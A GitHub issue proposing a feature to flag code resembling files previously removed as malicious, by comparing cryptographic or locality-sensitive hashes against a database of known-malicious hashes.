New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

feature: automatically identify code removed previously for being malicious. #95

Open

AngeloD2022 opened this issue Apr 13, 2023 · 0 comments

Contributor

AngeloD2022 commented Apr 13, 2023

A couple ideas for approaching this (just spitballing, possible better solutions exist as well):

taking a cryptographic hash of a file (language agnostic but inflexible to minor code changes)
computing a locality-sensitive hash of the malicious file using opcode disassembly or AST features (python-specific)
- the similarity of another file to a known malicious hash could be taken using the Levinshtein distance of the hash of a file with a known malicious file's hash.

This would obviously require a database of some sort (and committing thereto malicious file hashes in response to reports).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment